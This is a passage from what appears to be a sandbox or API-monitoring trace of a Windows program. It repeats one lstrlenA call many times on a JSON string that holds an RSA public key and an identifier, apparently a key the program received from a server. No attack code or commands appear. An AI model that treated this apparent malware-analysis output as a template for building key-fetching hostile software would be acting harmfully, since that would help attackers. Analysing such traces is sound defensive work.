KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.761] lstrlenA (lpString="-----BEGIN PUBLIC 